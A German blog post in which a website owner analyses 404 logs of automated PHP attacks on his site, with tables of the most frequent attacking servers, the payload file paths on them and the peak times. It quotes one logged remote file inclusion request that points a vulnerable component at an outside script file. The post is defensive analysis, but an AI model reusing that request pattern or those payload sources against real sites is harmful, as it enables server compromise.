Sicherheitsrisiken einer Homepage durch automatisierte Angriffe

Derzeit habe ich ein Plugin laufen, welches mir jeden “Fehltritt” eines Besuchers speichert und ausgibt. Ursprünglich setzt es automatisch und manuell Weiterleitungen von nicht mehr existenten Seiten auf ausgewählte oder eben die richtige neue Seite.

Wenn dann ein Link ins leere läuft und einen 404-Error-Code erzeugt werden alle Informationen in eine Liste geschrieben. Schöner Nebeneffekt ist, dass ich aufgrund meiner Infrastruktur der Links auch gleichzeitig jeden versuchten PHP-Angriff sehe.

Das Ganze sieht dann in etwa so aus:

http://www.webregard.de/components/ com_mp3_allopass/allopass.php?osConfig_live_site= http://$$$$$$.com.cn/zhuanti/dkp/02.txt?

Ich habe mir mal die Mühe gemacht und die ganzen Attacken via SQL zusammenzufassen und auszugeben, dabei kommen folgende Ergebnisse raus welche eine schöne Übersicht gibt:

Die meist benutzten Angriff-Server (zur vollständigen Liste):

attacken server
169 64.22.125.219
116 www.gumgangfarm.com
103 bglradio.net
93 www.partyanimals.nl
86 www.mta.cl
73 www.beautiful-atlanta.com
51 novipazar.info
45 munhag.com
45 ecology.275mb.com
45 www.tkp.edu.hk
40 www.dip-kostroma.ru
38 users.volja.net
38 www.7s-softball.com
37 www.bes.org.tr
32 opsz.3x.ro
30 test.iearn.uz
29 www.cartographia.org
29 webcal.promocall.de
29 212.78.204.20
28 www.geocities.com

Die meist benutzten Pfade auf den Servern (zur vollständigen Liste):

attacken pfad
168 /r0x/id.txt???
110 /shop/data/id.txt?
103 //WebCalendar/id.txt???
73 /admin/id.txt?
64 /galeria2/galery.txt?
58 /id.txt?
50 //on.txt?
50 /new/id.txt?
44 /safeon.txt??
40 /bak_skompa/themes/runcms/menu/images/.asc/www?
38 /xmass/test.txt????
37 /kimgyeongho/count/data/data/new.txt??
36 /modules/tinycontent/content/load.txt??
35 /uploads/kola.txt?????
30 /images/r57?
29 /everdreams/irc.txt??
28 /test.iearn.uz/help.txt???
27 /web/components/id.txt???
25 /securespr.txt??
25 /uploads/yes.txt???

Die Uhrzeit mit den meisten AKtivitäten (zur vollständigen Liste):

attacken zeit
26 15:20
25 04:18
23 20:56
20 13:09
20 06:44
18 21:00
18 20:35
18 19:31
17 00:04
17 17:56

Deuten lässt sich das so, zu Stoßzeiten versucht man über den Hauseigenen Webspace oder schon zugängliche Server Text-Dateien auf andere Server zu injizieren. Mit steigender Vernetzung im Web und Beliebtheit der Seite steigen natürlich die automatisierten Hack-Angriffe. Somit kann eine Seite wie mister-wong.de viele viele Tausend Attacken verzeichnen, am Tag. Bei mir sind es etwa 100 bis 200 und meine Seite ist noch nicht sehr bekannt.

Leave a Reply

Your email address will not be published. Required fields are marked *